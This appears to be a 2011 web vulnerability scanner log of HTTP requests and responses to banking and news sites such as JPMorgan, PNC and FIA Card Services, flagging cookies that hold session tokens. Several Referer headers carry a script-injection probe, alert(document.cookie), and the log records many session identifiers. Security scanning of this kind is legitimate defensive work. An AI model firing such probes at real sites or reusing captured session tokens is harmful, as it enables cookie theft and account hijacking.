GET /NASApp/NetAccess/DisplayScreen HTTP/1.1 Host: www.ibsnetaccess.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000UNiRaq4SV-vGMcUowkf6zr5:15bs25f24; origin=https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay; TLTUID=C697A0BA2F17102F003A8D446414B7D1; URLNamespace=ibsnetaccess; TLTSID=C697A0BA2F17102F003A8D446414B7D1;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:19:24 GMT Server: IBM_HTTP_Server Pragma: no-cache Expires: Tues, 01 Jan 1980 00:00:00 GMT Set-Cookie: JSESSIONID=0000uaCptzS4RqcUf5UlN91Tkfl:15bs25f24; Path=/; Secure Cache-Control: no-store, no-cache=set-cookie Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 5528
<html lang="en">
<head> <title>FIA Card Services Net Access: Server Unavailable</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /NASApp/NetAccess/LoginDisplay HTTP/1.1 Host: www.ibsnetaccess.com Connection: keep-alive Referer: http://www.ibsnetaccess.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=C697A0BA2F17102F003A8D446414B7D1; TLTUID=C697A0BA2F17102F003A8D446414B7D1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /NASApp/NetAccess/LoginValidation HTTP/1.1 Host: www.ibsnetaccess.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000UNiRaq4SV-vGMcUowkf6zr5:15bs25f24; origin=https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay; TLTUID=C697A0BA2F17102F003A8D446414B7D1; URLNamespace=ibsnetaccess; TLTSID=C697A0BA2F17102F003A8D446414B7D1;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:19:27 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=0000S2Q7Etp_lSrb_lYGF1ZPcz6:15bs25f24; Path=/; Secure Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 16003
<html lang="en">
<head> <title>FIA Card Services Net Access: Log In Error</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /NASApp/NetAccess/PreAuthentication HTTP/1.1 Host: www.ibsnetaccess.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000UNiRaq4SV-vGMcUowkf6zr5:15bs25f24; origin=https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay; TLTUID=C697A0BA2F17102F003A8D446414B7D1; URLNamespace=ibsnetaccess; TLTSID=C697A0BA2F17102F003A8D446414B7D1;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:19:21 GMT Server: IBM_HTTP_Server Pragma: no-cache Expires: Tues, 01 Jan 1980 00:00:00 GMT Set-Cookie: JSESSIONID=0000dPT7JwmMY0OXpSKUutpWwl4:15bs25f24; Path=/; Secure Cache-Control: no-store, no-cache=set-cookie Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 9179
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /NASApp/NetAccess/TermsOfUseDisplay HTTP/1.1 Host: www.ibsnetaccess.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000UNiRaq4SV-vGMcUowkf6zr5:15bs25f24; origin=https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay; TLTUID=C697A0BA2F17102F003A8D446414B7D1; URLNamespace=ibsnetaccess; TLTSID=C697A0BA2F17102F003A8D446414B7D1;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:19:26 GMT Server: IBM_HTTP_Server Pragma: no-cache Expires: Tues, 01 Jan 1980 00:00:00 GMT Set-Cookie: JSESSIONID=00001XDvv31_zmrc9v6Tt1PrDw0:15bs25f24; Path=/; Secure Cache-Control: no-store, no-cache=set-cookie Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 22822
<html lang="en">
<head> <title>FIA Card Services Net Access: Terms of Use</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /NASApp/NetAccess/popupAction.action HTTP/1.1 Host: www.ibsnetaccess.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000UNiRaq4SV-vGMcUowkf6zr5:15bs25f24; origin=https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay; TLTUID=C697A0BA2F17102F003A8D446414B7D1; URLNamespace=ibsnetaccess; TLTSID=C697A0BA2F17102F003A8D446414B7D1;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:19:20 GMT Server: IBM_HTTP_Server Content-Length: 0 Set-Cookie: JSESSIONID=000012ZpG3MaDEXER8Vm_WoG-co:15bs25f24; Path=/; Secure Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/plain Content-Language: en-US
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /News/Local/2011-02-01/article-2189851/Premiers-Cup-goes-to-Northport-fisher/1 HTTP/1.1 Host: www.journalpioneer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cm/Satellite?c=JPM_Stylesheet_C&cid=1153920691252&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACE_COOKIE=R2666079405; JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Fri, 04-Feb-2011 00:24:08 GMT Date: Thu, 03 Feb 2011 00:07:24 GMT Server: Apache Cache-Control: no-cache="set-cookie" host_service: FutureTenseContentServer:6.3.0 X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: JpmcSession=dGGvNJxcGh2xhXjnF1JqhCZ4Ljh3M5mCNBT3J8BqsXfzcQ0M5J7F!-1882927501; path=/ P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: text/css Content-Length: 12349
/* Global (utility) nav styling */
div#globalNav div#utilSearch ul { padding-left: 14px; /* to make room for corner img */ }
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/jpmorgan HTTP/1.1 Host: www.jpmorgan.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2975777359; path=/; expires=Thu, 03-Feb-2011 22:26:48 GMT Date: Wed, 02 Feb 2011 22:19:27 GMT Cache-Control: no-cache="set-cookie" Content-Type: text/html; charset=UTF-8 host_service: FutureTenseContentServer:6.3.0 X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: JpmcSession=GnrDNJYP3rQ6L11G2synp0JL6JxHXW9TGdB8vMPC1NQGLx57M16r!-1967453422; path=/ P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/jpmorgan/home/business HTTP/1.1 Host: www.jpmorgan.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501;
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Fri, 04-Feb-2011 01:34:32 GMT Date: Thu, 03 Feb 2011 01:16:45 GMT Cache-Control: no-cache="set-cookie" Content-Type: text/html; charset=UTF-8 host_service: FutureTenseContentServer:6.3.0 X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: JpmcSession=nMmqNKBd14mKjKprddLgg5LQG3W84YhRbtH7cwbSXg0JbGWdDwn2!-1882927501; path=/ P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http: ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/jpmorgan/home/corporations HTTP/1.1 Host: www.jpmorgan.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501;
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Fri, 04-Feb-2011 01:34:32 GMT Date: Thu, 03 Feb 2011 01:16:44 GMT Cache-Control: no-cache="set-cookie" Content-Type: text/html; charset=UTF-8 host_service: FutureTenseContentServer:6.3.0 X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: JpmcSession=dngnNKBcnCxn90npyRDyBRmBnpqDC3L4fh11tPryZhTxzXDlLp0W!-1882927501; path=/ P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http: ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/jpmorgan/home/fi HTTP/1.1 Host: www.jpmorgan.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501;
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Fri, 04-Feb-2011 01:34:32 GMT Date: Thu, 03 Feb 2011 01:16:45 GMT Cache-Control: no-cache="set-cookie" Content-Type: text/html; charset=UTF-8 host_service: FutureTenseContentServer:6.3.0 X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: JpmcSession=VKhMNKBdKXGg21v2VpNq1hs84JLkKRCZv8TTq0yYQW0GJck1BT00!-1882927501; path=/ P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http: ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/jpmorgan/home/individuals HTTP/1.1 Host: www.jpmorgan.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501;
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Fri, 04-Feb-2011 01:34:32 GMT Date: Thu, 03 Feb 2011 01:16:48 GMT Cache-Control: no-cache="set-cookie" Content-Type: text/html; charset=UTF-8 host_service: FutureTenseContentServer:6.3.0 X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: JpmcSession=qLlxNKCQnmKCgKr8R2yplG5KPhTQD1P2b542BT6zCWczkzGRqQLv!-1882927501; path=/ P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/jpmorgan/home/publicsector HTTP/1.1 Host: www.jpmorgan.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501;
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Fri, 04-Feb-2011 01:34:32 GMT Date: Thu, 03 Feb 2011 01:16:46 GMT Cache-Control: no-cache="set-cookie" Content-Type: text/html; charset=UTF-8 host_service: FutureTenseContentServer:6.3.0 X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: JpmcSession=ZnCLNKBp7KKQH0Lj93TByDF7HqFmm2TFz1KdT1wdzzw3MJ2hCdpY!-1882927501; path=/ P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http: ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cron_image.html HTTP/1.1 Host: www.macaudailytimes.com.mo Proxy-Connection: keep-alive Referer: http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(document.cookie)-'045651d38d6=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VivvoSessionId=3a9063f24d4a054f92c63
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /imagecode.html?article_id=21109 HTTP/1.1 Host: www.macaudailytimes.com.mo Proxy-Connection: keep-alive Referer: http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(document.cookie)-'045651d38d6=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VivvoSessionId=3a9063f24d4a054f92c63
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/lang.php HTTP/1.1 Host: www.macaudailytimes.com.mo Proxy-Connection: keep-alive Referer: http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(document.cookie)-'045651d38d6=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VivvoSessionId=3a9063f24d4a054f92c63
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /times-lab/21109-Tragedy-our-Commons.html HTTP/1.1 Host: www.macaudailytimes.com.mo Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /fnmsonline/fnms_ms_login.asp HTTP/1.1 Host: www.merchantsummary.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 176 Content-Type: text/html Location: https://www.Merchantsummary.com/fnms_ms_login.aspx?nb=1 X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDQEQCQCRA=BOIHGBOAAICKLCDGOIBCPALB; secure; path=/ Date: Wed, 02 Feb 2011 22:19:30 GMT Connection: close
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="https://www.Merchantsummary.com/fnms_ms_login.aspx?nb=1">here</a>.</body>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /my/charteroneinvest HTTP/1.1 Host: www.mystreetscape.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: FWS/7.0 Date: Wed, 02 Feb 2011 22:19:32 GMT P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi" Set-cookie: MC=ICnV^lPuGcmwLOC9l5HCSfEXjIkSAk1J2HQKA0w6IAAOywABqjMGBAAAAQAGBU1J2HQAP03; path=/; domain=.mystreetscape.com; expires=Thu, 02-Feb-2012 22:19:32 GMT Set-cookie: spc=311; path=/ Cache-control: public Set-cookie: HttpOnly Set-cookie: JSESSIONID=48E9C3976D90BB921D5C93D8E938BE52; path=/; secure Content-length: 264 Content-type: text/html Fsreqid: REQ4d49d8740a034c3a20000ecb0000aa33 Fscalleeid: ibweb311 Fselapsedtime: 9719 Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /my/citizensinvest HTTP/1.1 Host: www.mystreetscape.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: FWS/7.0 Date: Wed, 02 Feb 2011 22:19:32 GMT P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi" Set-cookie: MC=^dlv6nLB_DEtlMTGowZrrNRWb_gSAk1J2HQKA0w6IAAO3QABqjMGBAAAAQAGBU1J2HQAP03; path=/; domain=.mystreetscape.com; expires=Thu, 02-Feb-2012 22:19:32 GMT Set-cookie: spc=321; path=/ Cache-control: public Set-cookie: HttpOnly Set-cookie: JSESSIONID=7117D3482F67F60B23716F580E8C6714; path=/; secure Content-length: 259 Content-type: text/html Fsreqid: REQ4d49d8740a034c3a20000edd0000aa33 Fscalleeid: ibweb321 Fselapsedtime: 9769 Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /generalinfo.asp HTTP/1.1 Host: www.oneofacard.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Connection: close Date: Wed, 02 Feb 2011 22:32:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /generalinfo2.asp Content-Length: 138 Content-Type: text/html Set-Cookie: ASPSESSIONIDQSABQSCC=CGBGOCGAHLGCAJHNOCOBCPKB; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/generalinfo2.asp">here</a>.</body>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /generalinfo.asp HTTP/1.1 Host: www.oneofacard.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Connection: close Date: Wed, 02 Feb 2011 22:19:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /generalinfo2.asp Content-Length: 138 Content-Type: text/html Set-Cookie: ASPSESSIONIDQARBSQDD=LANFCHGAPKNKIBJOHFFMMEGK; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/generalinfo2.asp">here</a>.</body>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /generalinfo2.asp HTTP/1.1 Host: www.oneofacard.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:19:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 4353 Content-Type: text/html Set-Cookie: ASPSESSIONIDQARBSQDD=MANFCHGAJMLLDLMDMBKANAFE; path=/ Cache-control: private
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" ...[SNIP]...
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /alservlet/ForgotUserIdServlet HTTP/1.1 Host: www.onlinebanking.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /alservlet/OnlineBankingServlet HTTP/1.1 Host: www.onlinebanking.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"> <html> <head> <title>PNC Bank Online Banking</title> <meta http-equiv="Expires" content=" ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/gpl-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/mit-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/sec/Forms.do HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/sec/ProductsAndService.do HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/Blank.do HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/Gateway.do?siteArea=/pnccorp/PNC/Home HTTP/1.1 Host: www.pnc.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993
PNCSessionCookie=/pnccorp/PNC/Home/Small Business; Expires=Thu, 02 Feb 2012 23:45:33 GMT; Path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
